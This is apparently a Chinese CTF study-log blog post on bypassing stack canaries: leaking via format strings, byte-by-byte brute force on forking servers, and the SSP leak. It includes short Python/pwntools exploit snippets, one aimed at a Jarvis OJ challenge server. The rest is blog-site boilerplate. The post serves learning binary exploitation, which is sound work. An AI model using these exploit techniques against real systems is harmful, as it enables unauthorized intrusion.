日志 7.10 pwn

最新推荐文章于 2024-10-17 12:12:45 发布
最新推荐文章于 2024-10-17 12:12:45 发布
阅读量218 收藏
点赞数
分类专栏: 资料 日志 文章标签: 日志 二进制 网络安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RobinZZX/article/details/95330754
版权

canary

在函数执行语句之前,在栈上插入一个值,这个值不能得到或预测,在函数语句执行完之后,会查看栈中的值是否被修改/覆盖来判断是否被溢出,若值被修改则调用___stack_chk_fail()来结束程序。

利用方法:

1. 泄露canary

使用条件:格式化字符串漏洞+找到canary在栈中的偏移
利用格式化字符串漏洞等泄露出canary

2. 爆破canary

使用条件:有fork()机制
在有fork()机制的文件上,fork()的作用相当于自我复制,每一次复制出来的程序,内存布局都是一样的,当然canary值也一样。那我们就可以逐位爆破,如果程序GG了就说明这一位不对,如果程序正常就可以接着跑下一位,直到跑出正确的canary。
注意:canary的最低位是\x00,32位canary的值是4字节,64位为8字节。
爆破:以32为例

canary = '\x00'
for j in range(3):
    for i in range(0x100):
        cn.send('a'*100 + canary + chr(i))
        a = cn.recvuntil('welcome\n')
        if 'recv' in a:
            canary += chr(i)
            break
3. 故意触发canary (Stack Smashing Protector)

当canary的值与原来不一致时,会调用___stack_chk_fail()函数,这个函数会将栈上的arg[0]参数打印出来,我们可以通过覆盖该参数来使程序打印出想要的内容

from pwn import *
context.log_level = 'debug'

cn = remote('pwn.jarvisoj.com', 9877)
#cn = process('pwn_smashes')
cn.recv()
cn.sendline(p64(0x0400d20)*200)
cn.recv()
cn.sendline()
cn.recv()
今日疑问:为什么这个需要再发送一次cn.sendline()呢?

TIPS:

ELF的重映射:当可执行文件足够小的时候,他的不同区段可能会被多次映射。

在这里插入图片描述

RobinZZX
关注
专栏目录
MS-DOS7.10镜像文件
09-11
VMware下安装MS-DOS7.10的镜像文件
MS-DOS7.10.ISO
09-11
VMware下安装MS-DOS7.10的镜像文件 vmware 虚拟机 dos 工具
jarvis OJ部分writeup
aoque9909的博客
02-23 191
[XMAN]level 0 [XMAN]level 1 —— 简单shellcode利用 [XMAN]level 2 [XMAN]level 3 —— ret2libc尝试 [XMAN]level2&level3 x64 [XMAN]level 4 —— DynELF [XMAN]level 5 smashes ——SSP leak & ELF重映射 Te...
ELF 文件中的section 和 segment
wo_der的博客
06-02 7642
ELF 是可执行目标文件的一种格式,上计算机系统的时候曾经简略的接触到,这个可执行文件中包含了 代码段,数据段等信息,供程序运行的时候进行调用,但是实在太久没有看到这个东西了,今天又看到了ELF文件的时候,对elf 节和 elf 段的概念很陌生 ELF segment 和 section 用上图来解释很恰当,其实就是对于elf文件中一部分相同内容的不同描述映射而已,就是上图红框中
ELF文件-段和程序头
王文清的博客
01-05 3983
可执行文件和共享目标文件(动态链接库)是程序在磁盘中的静态存储形式;要执行一个程序,系统就要先把相应的可执行文件和共享目标文件装载到进程的地址空间中,这样就形成一个可运行进程的内存空间布局,称为进程镜像;一个已经装载完成的进程空间中包含多个不同的段(Segment),比如,代码段、数据段、堆栈段,等等; 准备一个程序的内存镜像,大体上可以分为两个步骤:装载和链接;前者是把目标文件装载到内存中,
学习日志 7.10
xiannvbang的博客
07-10 129
  学习日志                                       姓名:石圆圆        日期:7.10     今日学习任务 学习嵌入式Linux开发工具的使用 今日任务完成情况 今日任务按计划完成 1.     熟练使用文本编辑器vim;(基...
filebeat7.10上传日志到ES7.14
fen_fen的专栏
10-26 310
filebeat7.10上传日志到ES7.14
ELK 收集 Tomcat 日志
王清欢的博客
03-14 5278
01 Tomcat 安装与测试 1.1 安装 Tomcat 安装Tomcat的本体和相关官方测试demo,参考链接 apt-get install tomcat8 -y # 安装Tomcat本体 apt-get install tomcat8-docs tomcat8-examples tomcat8-admin -y # 安装测试demo 1.2 Tomcat 启动检查 systemctl start tomcat8 # 启动Tomcat systemctl status tomcat8 netstat
ES7.10 集群部署
a1808862593的博客
09-07 310
1. node1创建证书、秘钥,直接回车先不设置密码。 2. 将证书、秘钥上传至node2、node3。 3. node1-3修改集群配置,添加认证配置并重启服务。
CodeSoft 7.10 安装包
最新发布
gitblog_09712的博客
10-17 825
CodeSoft 7.10 安装包 【下载地址】CodeSoft7.10安装包 CodeSoft 7.10 安装包欢迎使用CodeSoft 7.10,这是一个广受好评的软件开发工具,专为标签设计、条形码生成以及打印解决方案而打造 ...
Elasticsearch7.10集群搭建
qq_64519337的博客
07-10 1217
Elasticsearch 是一个分布式、RESTful 风格的搜索和分析引擎。它的核心基于 Apache Lucene,能够处理海量的数据,并支持实时的全文搜索。以下是关于 Elasticsearch 的详细介绍。在 Elasticsearch 中,索引是由一个或多个分片组成的。每个分片是一个完整的 Lucene 索引,独立存储数据并执行搜索操作。通过分片,Elasticsearch 可以将数据分布到多个节点上,从而提高系统的吞吐量和容错能力。
IAR For ARM 7.10 破解
04-19
iar7.10 破解 同时支持低版本的破解
elasticsearch 7.10
12-08
Elasticsearch 是一款开源的、分布式搜索和分析引擎,广泛应用于日志分析、全文检索、性能监控等多个领域。7.10 版本是其发展过程中的一个重要版本,带来了诸多性能优化和新特性。 **1. 分布式架构** Elasticsearch...
Proteus 7.10专业版 2012发布
03-28
Proteus软件是英国Lab Center Electronics公司出版的EDA工具软件(该软件中国总代理为广州风标电子技术有限公司)。它不仅具有其它EDA工具软件的仿真功能,还能仿真单片机及外围器件。它是目前比较好的仿真单片机及...
浏览器打开任意可执行exe文件方法
RobinZZX的博客
06-02 4227
思路:通过注册表注册自定义URL协议执行bat脚本,将文件路径作为参数传入环境:win10问题1:可以从浏览器直接打开可执行文件吗?答:不能。其实可以通过 实现软件直接打开,但是它是不安全的,并且现在被大多数现代浏览器禁止,只能在 ie 使用。而通过注册表自定义URL协议,通过将文件名、操作等作为参数加入URL并由浏览器访问,可以触发协议执行bat脚本执行相应操作。问题2:如何获取文件的路径?可以从浏览器上通过 直接获取吗?答:问题1我们知道无法在浏览器直接可执行exe文件。从外部打开的话,就需要有文件
关于 .init .fini .init_array .fini_array 日志 7.16 pwn
RobinZZX的博客
07-16 3295
查找资料的高效性 retn 返回到栈顶地址 关于 .init .fini .init_array .fini_array 其中存放着的是在main函数执行前执行的代码,由__libc_start_main调用,(__libc_start_main在libc.so上,所以先有start()调用__libc_start_main,再调用init段的代码)在这段代码中就有我们经常使用的libc_csu的...
强化学习部分基础算法总结(Q-learning DQN PG AC DDPG TD3)
RobinZZX的博客
11-14 2152
总结回顾一下近期学习的RL算法,并给部分实现算法整理了流程图、贴了代码。 1. value-based 基于价值的算法 基于价值算法是通过对agent所属的environment的状态或者状态动作对进行评分。对于已经训练好的模型,agent只需要根据价值函数对当前状态选择评分最高的动作即可;对于正在训练的模型,我们通常将目标值(真实行动带来的反馈)和价值函数的预测值的差距作为loss训练价值函数。 通常使用两种价值函数: 状态价值函数 V(s),策略为 π 的状态-值函数,即状态s下预计累计回报的期望值
Windows之间使用OpenSSH的ssh免密登录,排坑
RobinZZX的博客
04-10 2127
Windows上OpenSSH使用 排坑
MS-DOS7.10安装包:探索经典的DOS系统
资源摘要信息:"MS-DOS7.10完整安装光盘" MS-DOS(Microsoft Disk Operating System)是微软公司在1981年推出的一款基于命令行界面的操作系统。MS-DOS7.10是该系列操作系统的最后一个主要版本,它的推出标志着微软在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值